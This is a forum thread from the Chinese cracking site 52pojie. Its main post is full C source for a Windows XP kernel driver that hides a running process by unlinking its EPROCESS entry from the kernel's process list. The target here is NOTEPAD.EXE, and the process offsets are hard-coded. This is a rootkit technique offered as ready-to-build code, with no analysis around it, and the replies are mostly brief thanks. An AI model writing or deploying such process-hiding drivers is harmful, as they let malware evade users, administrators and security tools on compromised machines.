吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 3517|回复: 10
收起左侧

[其他转载] 进程断链 很简单的小玩意

[复制链接]
古月不傲 发表于 2019-11-28 03:27
本帖最后由 古月不傲 于 2020-6-13 12:47 编辑

[C] 纯文本查看 复制代码
#include <ntddk.h>

enum XP_SYSTEM
{
        g_uNextProcess = 0x88,
        g_uPrevProcess = 0x8c,
        g_uImageFileName = 0x174
};

PLIST_ENTRY g_pListEntryTemp = NULL;
PLIST_ENTRY g_pHeadEntry = NULL;

VOID MyDriverUnload(PDRIVER_OBJECT pDriverObject)
{
        if (g_pListEntryTemp != NULL)
        {
                InsertHeadList(g_pHeadEntry, g_pListEntryTemp);
        }
}

VOID HideProcessor()
{
        PEPROCESS pCurrrentProcess = NULL;
        PEPROCESS pPreviousProcess = NULL;

        pCurrrentProcess = PsGetCurrentProcess();
        pPreviousProcess = (PEPROCESS)(*((PULONG_PTR)((ULONG_PTR)pCurrrentProcess + g_uPrevProcess)) - g_uNextProcess);

        while (pCurrrentProcess != pPreviousProcess)
        {
                if (strcmp(((PCHAR)((ULONG_PTR)pCurrrentProcess + g_uImageFileName)), "NOTEPAD.EXE") == 0)
                {
                        KdPrint(("..."));
                        g_pListEntryTemp = (PLIST_ENTRY)(((ULONG_PTR)pCurrrentProcess + g_uNextProcess));
                        RemoveEntryList(g_pListEntryTemp);
                        break;
                }
                KdPrint(("---"));
                pCurrrentProcess = (PEPROCESS)(*((PULONG_PTR)((ULONG_PTR)pCurrrentProcess + g_uNextProcess)) - g_uNextProcess);
        }
}

NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pStrRegPath)
{
        g_pHeadEntry = (PLIST_ENTRY)((ULONG_PTR)PsGetCurrentProcess() + g_uNextProcess);
        pDriverObject->DriverUnload = MyDriverUnload;
        __try
        {
                HideProcessor();
        }
        __except (EXCEPTION_EXECUTE_HANDLER)
        {
                KdPrint(("异常..."));
        }
        return STATUS_SUCCESS;
}



免费评分

参与人数 3吾爱币 +2 热心值 +3 收起 理由
vectra + 1 + 1 谢谢@Thanks!
sdaza + 1 热心回复!
む人生似梦 + 1 + 1 热心回复!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

头像被屏蔽
白羊mo 发表于 2019-11-28 06:07
提示: 该帖被管理员或版主屏蔽
richens 发表于 2019-11-28 06:38
头像被屏蔽
 楼主| 古月不傲 发表于 2019-11-28 06:58
lovxyj 发表于 2019-11-28 07:25
了解一下,学习学习
xixniyuzhou 发表于 2019-11-28 08:04
小白学习一下
wdz2018 发表于 2019-11-28 08:24
看着就觉得好厉害
nblg 发表于 2019-11-28 09:14
觉得好厉害
tony666 发表于 2019-11-28 09:34
先收藏了,回去用自己电脑试试
284406022 发表于 2019-11-28 13:54
看了代码, 回到了以前隐藏进程的年代,  断链,抹除pe头
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-25 21:26

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表